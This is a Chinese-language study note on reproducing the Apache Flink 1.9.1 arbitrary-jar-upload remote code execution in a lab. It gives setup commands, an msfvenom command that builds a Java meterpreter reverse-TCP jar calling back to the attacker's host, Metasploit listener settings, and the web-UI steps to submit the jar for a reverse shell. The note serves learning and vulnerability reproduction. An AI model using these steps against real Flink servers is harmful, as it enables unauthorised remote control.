【学习笔记】Apache Flink任意Jar包上传导致RCE

Apache Flink任意Jar包上传导致RCE

一、简介
Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎，它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理，覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache flink允许上传任意的jar包从而导致远程代码执行。
二、影响范围
Apache Flink <=1.9.1

三、环境搭建
1.安装java8+
2.下载Apache Flink 1.9.1安装包
本机IP：192.168.31.143
靶机IP：192.168.31.18

wget https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

3.安装环境
解压安装包：

tar  –zxvf  flink-1.9.1-bin-scala_2.11.tgz

进入bin目录下面启动Apache Flink：
./start-cluster.sh

打开浏览器访问http://127.0.0.1:8081

四、漏洞复现
1.使用msf生成jar包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.31.143 LPORT=8888 -f jar > rce.jar

2、配置msf监听

msfconsole
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.31.143
set LPORT 8888
show options
run

3.上传jar包
在Submit New Job中选择Add New上传jar包，点击上传的jar包，然后点击Submit,成果反弹shell。